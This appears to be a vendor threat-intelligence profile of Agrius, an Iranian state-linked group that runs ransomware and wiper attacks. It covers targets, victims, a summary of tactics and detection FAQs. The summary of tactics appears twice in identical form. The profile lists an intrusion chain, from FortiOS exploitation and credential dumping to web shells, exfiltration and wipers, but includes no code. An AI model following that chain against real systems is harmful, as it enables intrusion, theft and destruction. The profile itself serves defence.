Agrius
Agrius is an Iranian state-linked APT group known for disruptive ransomware and wiper attacks, primarily targeting Israeli and Middle Eastern entities under various aliases including SPECTRAL KITTEN and Black Shadow.
The Origin of Agrius
Agrius is an Iranian state-sponsored Advanced Persistent Threat (APT) group active since at least 2020, closely aligned with Iran’s Ministry of Intelligence and Security (MOIS). Also tracked under aliases such as SPECTRAL KITTEN, Black Shadow, and Pink Sandstorm, Agrius is known for its hybrid use of ransomware and wiper malware in destructive operations, particularly against Israeli entities. Their campaigns often disguise politically motivated attacks as financially motivated ransomware incidents, a tactic termed “lock-and-leak” where stolen data is exfiltrated and then leaked via eCrime channels.
The group makes extensive use of custom malware, such as IPSecHelper, Apostle ransomware, and FlowTunnel proxy tools. Recent intelligence links Agrius operators to Jahat Pardaz, a suspected front company for MOIS, and highlights their capability in high-impact cyber operations.
Countries Targeted
Primary geographic targets include:
- Israel, where the majority of destructive and credential-theft operations are concentrated.
- United Arab Emirates (UAE), where Agrius has engaged in limited but notable disruptions, including targeting logistics firms.
- Additionally, there has been historical targeting of telecommunications infrastructure in South Asia, suggesting some operational reach outside of the Middle East.
Industries Targeted
Agrius has a broad targeting scope across both public and private sectors, notably including:
- Academic and research institutions
- Consulting and professional services
- Engineering, industrials, and logistics
- Military, maritime, and transportation
- Financial services and insurance
- Technology, media, and telecommunications
- Government agencies and social media platforms
Their ability to operate across so many verticals indicates a strategic alignment with Iranian geopolitical interests, especially in espionage and disruption.
Known Victims
Known victim profiles include:
- Israeli academic institutions, where they have conducted multi-phase operations involving credential harvesting and PII exfiltration.
- A logistics entity in the UAE, impacted through disruptive malware.
- An Iranian-opposition UK-based news outlet, targeted in an influence operation, demonstrating Agrius's integration of psychological operations alongside technical intrusion.
The Agrius Attack Method
Exploits vulnerable public-facing apps, notably CVE-2018-13379 in FortiOS; uses ProtonVPN for anonymization.
Deploys IPSecHelper malware as a service for persistence; uses PetitPotato for local privilege escalation.
Deactivates security tools with anti-rootkit tools like GMER64.sys, modifies EDR settings, and uses masquerading techniques.
Dumps LSASS memory and SAM files with Mimikatz; engages in SMB brute forcing and password spraying.
Conducts host and network scanning with tools like NBTscan, SoftPerfect, and WinEggDrop.
Uses RDP tunneling via Plink and ASPXSpy web shells; downloads payloads from public file sharing services.
Gathers PII and SQL data using custom tools like sql.net4.exe; stages data locally in hidden directories.
Executes scripts and binaries via Windows command shell; uses renamed system utilities for stealth.
Archives data using 7zip; exfiltrates via tools like PuTTY and WinSCP through AES-encrypted HTTP channels.
Deploys Apostle ransomware and data wipers to cause operational disruption; leaks data to the public for influence operations.
Exploits vulnerable public-facing apps, notably CVE-2018-13379 in FortiOS; uses ProtonVPN for anonymization.
Deploys IPSecHelper malware as a service for persistence; uses PetitPotato for local privilege escalation.
Deactivates security tools with anti-rootkit tools like GMER64.sys, modifies EDR settings, and uses masquerading techniques.
Dumps LSASS memory and SAM files with Mimikatz; engages in SMB brute forcing and password spraying.
Conducts host and network scanning with tools like NBTscan, SoftPerfect, and WinEggDrop.
Uses RDP tunneling via Plink and ASPXSpy web shells; downloads payloads from public file sharing services.
Gathers PII and SQL data using custom tools like sql.net4.exe; stages data locally in hidden directories.
Executes scripts and binaries via Windows command shell; uses renamed system utilities for stealth.
Archives data using 7zip; exfiltrates via tools like PuTTY and WinSCP through AES-encrypted HTTP channels.
Deploys Apostle ransomware and data wipers to cause operational disruption; leaks data to the public for influence operations.
TTPs used by Agrius
How to Detect Agrius with Vectra AI
FAQs
What is Agrius’s primary motivation?
Agrius conducts espionage and disruptive operations aligned with Iranian state interests, often masked as ransomware for plausible deniability.
How does Agrius gain initial access to networks?
They primarily exploit public-facing applications, especially Fortinet’s FortiOS (CVE-2018-13379), and use VPN services like ProtonVPN to obscure their origin.
What type of malware is Agrius known for?
Agrius uses IPSecHelper, Apostle ransomware, ASPXSpy, and the FlowTunnel proxy tool among others.
They deploy malware as Windows services (e.g., IPSecHelper) and use web shells for long-term access.
What are Agrius’s data exfiltration methods?
Data is archived using 7zip, staged locally, and exfiltrated using PuTTY or WinSCP, often over encrypted C2 channels.
How do they evade detection?
By disabling EDR tools, masquerading binaries, and base64 encoding scripts, Agrius evades traditional defenses.
What is their preferred method of lateral movement?
They use RDP tunneling through compromised web shells and tools like Plink, as well as acquiring valid credentials.
What detection strategies are effective against Agrius?
Monitoring for abnormal RDP tunneling, use of Plink, or sudden appearance of tools like Mimikatz or IPSecHelper can be effective. Network Detection and Response (NDR) and behavioral analytics are key.
What industries are at highest risk from Agrius?
Organizations in Israel across sectors like academia, telecom, and logistics, as well as UAE-based logistics and transport firms, are primary targets.
Is Network Detection and Response (NDR) useful in defending against Agrius?
Yes. NDR is particularly valuable in detecting encrypted C2 traffic, abnormal lateral movements, and data exfiltration behavior that bypass endpoint controls.